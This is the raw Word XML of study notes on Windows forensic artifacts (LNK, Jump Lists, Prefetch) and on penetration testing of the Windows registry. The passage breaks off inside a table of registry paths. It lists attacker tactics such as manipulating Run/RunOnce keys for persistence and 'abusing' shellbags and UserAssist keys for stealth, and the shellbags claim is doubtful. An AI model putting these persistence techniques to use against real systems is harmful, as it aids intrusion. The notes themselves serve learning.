        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File and Prefetch Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ACBA76" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LNK Files (Shortcuts):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247A1204" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>C:\Users\username\AppData\Roaming\Microsoft\Windows\Recent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11F26D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">Use tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TZWorks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> lp.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> for analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E2AAC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Jump Lists (Enhanced LNK files):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207D1B0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31043889" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>C:\Users\username\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9B351" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>C:\Users\username\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B60F235" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TZWorks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> jmp.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> for parsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6138B58A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Jump Lists embed LNK files in a database structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57996A9D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefetch &amp; SuperFetch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339BF010" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Prefetch: Introduced in Windows XP to speed up app launches by caching file access patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055664A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>SuperFetch &amp; ReadyBoost: Added/enhanced in Vista+ for improved performance, using RAM and USB drives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741DB81" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Prefetch files stored at C:\Windows\Prefetch\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648ECDA9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Filename format: EXENAME-HASH.pf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5574C6E7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Hash is based on the full path of executable (e.g., CALC.EXE-AC08706A.pf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF6514" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Registry settings at:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD5B651" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Control\Session Manager\Memory Management\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>PrefetchParameters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14BFF342" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>EnablePrefetcher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3D670" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>0 = Disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A647A7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>1 = Application prefetching only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1797A7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>2 = Boot prefetching only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7321AE2B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>3 = Both application and boot prefetching (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2392EA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disk Defragmenter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C81F67" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Scheduled every 3 days by Task Scheduler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969B11F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Uses Layout.ini (from prefetch data) to optimize file layout on HDD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BCD204" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="44D1E8E7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows &amp; Active Directory Penetration Testing: Windows Registry Focus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E0ACBA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F2800" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">The Windows Registry is a hierarchical database storing low-level OS and application configuration. Attackers and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>pentesters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> leverage it to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE45F8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Discover user activity and system configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8EF6E4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Identify persistence mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA23A5B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Find artifacts of USB device usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A59CE0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Enumerate network and share configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FF726" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:lastRenderedPageBreak/>
        <w:t>Detect forensic evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F392201" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">Perform lateral movement or persistence via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA58DB" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="1973375B">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8F90E4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tactics, Techniques, and Strategies (TTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB651AC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Reconnaissance &amp; Evidence Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F67FAF7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Enumerate user activity and history (MRU lists, typed paths)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313BA83" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Identify mounted USB devices and their history for data exfiltration or artifact analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6F2D5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Extract network connection history and interface configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE948B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Examine shared resources and open shares on hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595770F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Persistence &amp; Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720536C4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">Search and manipulate Run/RunOnce keys for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12DF82" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">Abuse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>shellbags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>UserAssist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> keys for stealth persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815640D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Use USB device serial and mount history to track removable media usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AC4129" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Lateral Movement &amp; Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C6DBA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Enumerate shares and network interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1A5C5F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Map firewall profiles and network locations (NLA keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756A69D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:t>Identify recently accessed networks and domain join status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242C9D9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="741F507C">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67466A90" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Registry Paths &amp;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8"/>
        <w:gridCol w:w="1878"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="3E9C609D" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13730343" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC297B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Registry Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E50D8DD" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC297B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose/Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="067F9242" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10334812" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6096A2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve">Most Recently Used (MRU) lists like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>LastVisitedPidlMRU</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="1F0C9B66" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="671A9370" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
